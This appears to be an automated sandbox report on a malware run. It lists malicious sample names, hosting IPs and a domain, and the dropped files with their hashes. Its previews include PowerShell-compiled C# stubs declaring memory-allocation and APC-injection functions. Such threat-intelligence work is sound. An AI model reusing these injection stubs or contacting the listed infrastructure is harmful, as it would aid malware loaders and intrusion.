	laka4.dll	Get hash	malicious	Browse	208.67.222.222
	o0AX0nKiUn.dll	Get hash	malicious	Browse	208.67.222.222
	a.exe	Get hash	malicious	Browse	208.67.222.222
	swlsGbeQwT.dll	Get hash	malicious	Browse	208.67.222.222
	document-1048628209.xls	Get hash	malicious	Browse	208.67.222.222
	document-69564892.xls	Get hash	malicious	Browse	208.67.222.222
	document-1813856412.xls	Get hash	malicious	Browse	208.67.222.222
	document-1776123548.xls	Get hash	malicious	Browse	208.67.222.222
	document-647734423.xls	Get hash	malicious	Browse	208.67.222.222
	document-1579869720.xls	Get hash	malicious	Browse	208.67.222.222
	document-895003104.xls	Get hash	malicious	Browse	208.67.222.222
	document-806281169.xls	Get hash	malicious	Browse	208.67.222.222
	document-1747349663.xls	Get hash	malicious	Browse	208.67.222.222
	document-1822768538.xls	Get hash	malicious	Browse	208.67.222.222
gtr.antoinfer.com	wuxvGLNrxG.jar	Get hash	malicious	Browse	185.228.233.17
	v8MaHZpVOY2L.vbs	Get hash	malicious	Browse	185.228.233.17
	beneficial.dll	Get hash	malicious	Browse	185.228.233.17
	mental.dll	Get hash	malicious	Browse	185.228.233.17
	lj3H69Z3Io.dll	Get hash	malicious	Browse	167.172.38.18
	SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll	Get hash	malicious	Browse	165.232.183.49
	documentation_39236.xlsb	Get hash	malicious	Browse	165.232.183.49
	3a94.dll	Get hash	malicious	Browse	165.232.183.49
	3b17.dll	Get hash	malicious	Browse	165.232.183.49
	9b9dc.dll	Get hash	malicious	Browse	165.232.183.49

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ITOS-ASRU	wuxvGLNrxG.jar	Get hash	malicious	Browse	185.228.233.17
	v8MaHZpVOY2L.vbs	Get hash	malicious	Browse	185.228.233.17
	beneficial.dll	Get hash	malicious	Browse	185.228.233.17
	mental.dll	Get hash	malicious	Browse	185.228.233.17
	1n0JwffkPt.exe	Get hash	malicious	Browse	185.228.233.5
	niaSOf2RtX.exe	Get hash	malicious	Browse	193.187.173.42
	ao9sQznMcA.exe	Get hash	malicious	Browse	193.187.175.114
	k87DGeHNZD.exe	Get hash	malicious	Browse	193.187.175.114
	iiLllZALpo.exe	Get hash	malicious	Browse	193.187.175.114
	E6o11ym5Sz.exe	Get hash	malicious	Browse	193.187.175.114
	Oo0Djz1juc.exe	Get hash	malicious	Browse	193.187.175.114
	JeqzgYmPWu.exe	Get hash	malicious	Browse	193.187.175.114
	HBkYcWWHmy.exe	Get hash	malicious	Browse	185.159.129.78
	report.11.20.doc	Get hash	malicious	Browse	193.187.175.31
	intelligence_11.20.doc	Get hash	malicious	Browse	193.187.175.31
	details-11.20.doc	Get hash	malicious	Browse	193.187.175.31
	deed contract_11.04.2020.doc	Get hash	malicious	Browse	193.187.175.31
	direct 11.20.doc	Get hash	malicious	Browse	193.187.175.31
	direct 11.20.doc	Get hash	malicious	Browse	193.187.175.31
	direct 11.20.doc	Get hash	malicious	Browse	193.187.175.31

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	11606
Entropy (8bit):	4.883977562702998
Encrypted:	false
SSDEEP:	192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
MD5:	1F1446CE05A385817C3EF20CBD8B6E6A
SHA1:	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
SHA-256:	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
SHA-512:	252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
Malicious:	false
Preview:	PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Temp\RES278F.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2184
Entropy (8bit):	2.6957227375056694
Encrypted:	false
SSDEEP:	24:Qj4Hn4uHUhKdNnI+ycuZhN2aakSPrPNnq9qp+e9Ep:G/uGKdV1ul2aa3PBq9p
MD5:	7A70AA133DC10F08D2B126501441764D
SHA1:	7DB42B4B534131D4102BFBCA868101E13B3D8385
SHA-256:	384BD6D8636BC2CCC114AE9BDECA5830EA95CD4309FC2D6CD9165851BB5B5087
SHA-512:	3E3E8D1DA11FD0A99386CC2F2BB5E600D47684433F6E51780CE9CB4B1CC53C143C65FB03DBB33878742655D8F4E0C20874FD416C8964A92A7782EAAF4C7383A9
Malicious:	false
Preview:	........R....c:\Users\user\AppData\Local\Temp\vbpfsg54\CSCC3210ABFD4B4742A7EBA7934EB0D0.TMP.................p...hg.k.CIY.............5.......C:\Users\user\AppData\Local\Temp\RES278F.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RES419.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2184
Entropy (8bit):	2.702547168800512
Encrypted:	false
SSDEEP:	24:p6wU/pwuZHqYhKdNNI+ycuZhNGoakSB9PNnq9qp2e9Ep:o7/pJ3Kd31ulda3xq9J
MD5:	59FDB760CFDBE45CD4E7B3B08E2A65E7
SHA1:	58A0B881B0B78B54706B2CE94C90BBEBF3B13189
SHA-256:	CDAA6DEADCACE399765F581EE2F523E98DF9E2B5E5AE945A86598948870BEAAE
SHA-512:	D432C5187C097E34D401F749D83C6ED2ADC0FEF3AD70B4CA840CEF71A7FD998B1EA3D49D669E1C056093EC7D22AFFDFB21CB36216B891CFD95C9DA353FAEE06C
Malicious:	false
Preview:	........T....c:\Users\user\AppData\Local\Temp\fedhsvoj\CSC2C7CB35724FE4D03B8B83A389D1E5FE.TMP.................]=..P*e:.C............4.......C:\Users\user\AppData\Local\Temp\RES419.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RESCE3.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2184
Entropy (8bit):	2.6928796688099577
Encrypted:	false
SSDEEP:	24:b7ECjWbZHcFhKdNNI+ycuZhN2akS+PNnq9qpKne9Ep:b73Wd8zKd31ul2a3iq9r
MD5:	C03E88A4901AF7F56E5FFF61330FFAB0
SHA1:	8390D7D99BD4F0E22B7431CA0C66BF6FD795E6FC
SHA-256:	72D719F92F6177350AC2A57E5569111B5CF2FD6594FC85EF67C7CBBC152CE838
SHA-512:	65A53D2E6068B995E83A76D4A4822C7E377D3FFC7C7838D6092FD5377098B8ADDDBC7967A5330B3BC04A63775F0DF72775EB116E480FE003B55FC6CF5524E2A9
Malicious:	false
Preview:	........S....c:\Users\user\AppData\Local\Temp\jqkof1ka\CSCA3035077FC7544A28C7D2FD8A94650.TMP.................ER.5.PV....c..g..........4.......C:\Users\user\AppData\Local\Temp\RESCE3.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RESE546.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2188
Entropy (8bit):	2.703792829688433
Encrypted:	false
SSDEEP:	24:BLFXTuHWWhKdNnI+ycuZhNeakSGPNnq92pizW9I:BLVTufKdV1ulea36q9Z
MD5:	80317721A448C1C3F57AB21AC4687790
SHA1:	572C9A76B90AA5E8B5B92949D83BDD7BBE8EF083
SHA-256:	0F2522BCA58554B368F5E889E7DC45B175C8551483E712BD6D9EF006F3D72EA4
SHA-512:	1E0A53D34126F52511A8EBADFD88AF8769B90C2138D2BC1FA20F4A72899DF7192DEEC4774F9AF3848BED3AED07FC70E0F2B37715A7B55754B8E0906DAAAC3192
Malicious:	false
Preview:	........U....c:\Users\user\AppData\Local\Temp\senxb4p4\CSCD728609DA3104BA4891CE07457BF77DE.TMP..................Q..e.[%...uv.f.=..........5.......C:\Users\user\AppData\Local\Temp\RESE546.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0w25flno.lby.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lusmgaxq.saw.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vb04gpdl.oyg.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xugd3ey5.3ho.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\fedhsvoj\CSC2C7CB35724FE4D03B8B83A389D1E5FE.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0981038818864084
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry8B3nYak7YnqqnB3nNPN5Dlq5J:+RI+ycuZhNGoakSB9PNnqX
MD5:	C1ECB5B35D3DD003502A653AE043FE1C
SHA1:	1D5D84EFD7EBD313368477945F3E0694AEAA386C
SHA-256:	372EE1943F4AC441652902BB345A00CC86776BF94A26D7F55D8EB94A50BD5474
SHA-512:	DB9127F01738B28B5BBC51B7D2FCEE307D0E38DD84F905B250CE4679FC5FF0D8D65298937A74F2A14D3DAEB321E00C29D4997853C602D8A6B3CF754E53FA469B
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...f.e.d.h.s.v.o.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...f.e.d.h.s.v.o.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	421
Entropy (8bit):	5.017019370437066
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJzLHMRSRa+eNMjSSRrLypSRHq1oZ6laAkKFM+Qy:V/DTLDfuxLP9eg5rLy4uMaLXjQy
MD5:	7504862525C83E379C573A3C2BB810C6
SHA1:	3C7E3F89955F07E061B21107DAEF415E0D0C5F5E
SHA-256:	B81B8E100611DBCEC282117135F47C781087BD95A01DC5496CAC6BE334A8B0CC
SHA-512:	BC8C4EAD30E12FB619762441B9E84A4E7DF15D23782F80284378129F95FAD5A133D10C975795EEC6DA2564EC4D7F75430C45CA7113A8BFF2D1AFEE0331F13E76
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tjuivx. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint yijswysfmu,uint rpdwbh);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr hkhhmwnsoyn,IntPtr xfehjdcey,uint nqamet,uint rvtfunn,uint mlrfbdrm);.. }..}.

C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	371
Entropy (8bit):	5.2334712612394405
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fhUzxs7+AEszI923f7:p37Lvkmb6KzJUWZE2z
MD5:	2C23B2E085F4199D4C6E6C8623241D5D
SHA1:	2C73E79A4AD603CD04085CC449714DD992F7B028
SHA-256:	086E71A7945A038BECB1061EB0AD61C12705C51B185C6BE9CEDFA973CF6BBBCB
SHA-512:	DBCB2FAA2D89FAE6712100095F5CFE1F4A1BAA284022C6F958339EFBEBE7CED0CE79C0D7E25ECD9C4CD86929E00B60E23D35DB90BCD5560058E0FF358BBE8B20
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.0.cs"

C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.636321788410477
Encrypted:	false
SSDEEP:	24:etGSxWMOWEey8MTz7X8daP0eWQ/UDdWSWtJ0DtkZf7BB7XI+ycuZhNGoakSB9PNq:667KMTcd6qq6WPVJ7X1ulda3xq
MD5:	112DE1BD9A6013310CFB56B9A64596BD
SHA1:	2713B96D018B9942164990E3B6476D21BBD3785F
SHA-256:	32CC2863F3D662DFFACD72E12841E49C2790C2AF6F9648991344D30393B35688
SHA-512:	1CAA1A2FCCB6B468684A97F9C08794D889ED6E4BE5D13E549962159BFFFD860E5026E02184C6F6BEB85891734F9D7C912E8183DB596EBE68DBEA71EA57C72961
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......L...#Strings............#US.........#GUID... ...T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......b.........h.....s.....z...........................b.!...b...!.b.&...b.......+.....4.A.....9.......K.......S......................................."..........<Module>.fedhsvoj.dll.tjuivx.W32.ms

C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\jqkof1ka\CSCA3035077FC7544A28C7D2FD8A94650.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1164554634436694
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry4ak7Ynqq+PN5Dlq5J:+RI+ycuZhN2akS+PNnqX
MD5:	084552A2352E5056D918B0CB63070867
SHA1:	29B1DDF49819AF4DDCD445B501BD36986762B9E4
SHA-256:	39B7045EBE7D7C1F1EC7530C84FEA108C81A996C53EBC549827EFC8C0981E716
SHA-512:	AF30B8A5DC262F30B8B38FD0E8C4992CF577B97FA668E15652CAD43AF26A2E17902D8B40E8881603568B3C9FBB959FF8775CB22DE29C4C784BCB8061FDB520C1
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.q.k.o.f.1.k.a...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.q.k.o.f.1.k.a...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	398
Entropy (8bit):	4.993655904789625
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJWLPMRSR7a1MIq+ZXIO1SRa+rVSSRnA/fHJGF0y:V/DTLDfu0LnQs9rV5nA/Ra0y
MD5:	C08AF9BD048D4864677C506B609F368E
SHA1:	23B8F42A01326DC612E4205B08115A4B68677045
SHA-256:	EA46497ADAE53B5568188564F92E763040A350603555D9AA5AE9A371192D7AE7
SHA-512:	9688FD347C664335C40C98A3F0F8D8AF75ABA212A75908A96168D3AEBFC2FEAAB25DD62B63233EB70066DD7F8FB297F422871153901142DB6ECD83D1D345E3C2
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class stkml. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr xwiefclj,IntPtr fqsexnr,IntPtr ormij);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint llcs,uint flwnybjk,IntPtr coa);.. }..}.

C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	371
Entropy (8bit):	5.279590024403947
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fIOtBHUzxs7+AEszI923fIOtb:p37Lvkmb6KzQkB0WZE2Qkb
MD5:	CE91C63B52C0B3073996F3E5FB0FFC43
SHA1:	85269AB2131AA110D0D1B664852AF348B9A8D5DD
SHA-256:	83B5EEE0222E4966BC1CCA51F238FAFA330D2D4EA92541FA179564C37208F1AB
SHA-512:	D9188A631858B0D53B307B1C97DEC99592AA68FAF09E50F1AF05A7663E8457216BCA5D28424CBAA1F8B0D5D686CFC9D8F64B296F21577287D24CF335494E622F
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.0.cs"

C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.597481857008232
Encrypted:	false
SSDEEP:	24:etGS4ktW/u2Dg85lxlok3JgpiqBz4MatkZfgOn6maUI+ycuZhN2akS+PNnq:6xtWb5lxF1oJgRm1ul2a3iq
MD5:	3DEB659030E8429D020973AA1DA844CD
SHA1:	EE94465F72829C743DAA421417A5BEF4A2BBF546
SHA-256:	560BF343A83E7447F7ECE8CB17EAD39EB2CAC2FF71625392EE62932D3A774DC0
SHA-512:	295B87A65F71EC20439824CD52944A558AC261B0E62AA58193A807A35467D6C5E8532BE9693A04064F4DF476AD9E805844A7D09BDF09DB031676ACCD63119A48
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................1....................................................... 8............ E............ X.....P ......c.........i.....r.....z.....................c. ...c...!.c.%...c.......*.....3.+.....8.......E.......X.......................................!........<Module>.jqkof1ka.dll.stkml.W32.mscorlib.Sy

C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\senxb4p4\CSCD728609DA3104BA4891CE07457BF77DE.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0854348998556316
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grygak7YnqqGPN5Dlq5J:+RI+ycuZhNeakSGPNnqX
MD5:	51B49665175B25AB17A87576C066F53D
SHA1:	BA7E241317F961DF9698A8D4A2A38E9329C49AA0
SHA-256:	1E38C28562A6465BA87AA81BA8E1D840DA471BDB87796551F693E782C3E2011B
SHA-512:	63FFF4C99C9CCC3160F585C7B0040EA2C3966F391A6D3E00614D4BE49DB6BCE7B7C5A5EE3897BDC6E02484C0EC01D3B9DDDAAF9445EFD3C9B3E37E3EA7F3558A
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.e.n.x.b.4.p.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.e.n.x.b.4.p.4...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	398
Entropy (8bit):	4.993655904789625
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJWLPMRSR7a1MIq+ZXIO1SRa+rVSSRnA/fHJGF0y:V/DTLDfu0LnQs9rV5nA/Ra0y
MD5:	C08AF9BD048D4864677C506B609F368E
SHA1:	23B8F42A01326DC612E4205B08115A4B68677045
SHA-256:	EA46497ADAE53B5568188564F92E763040A350603555D9AA5AE9A371192D7AE7
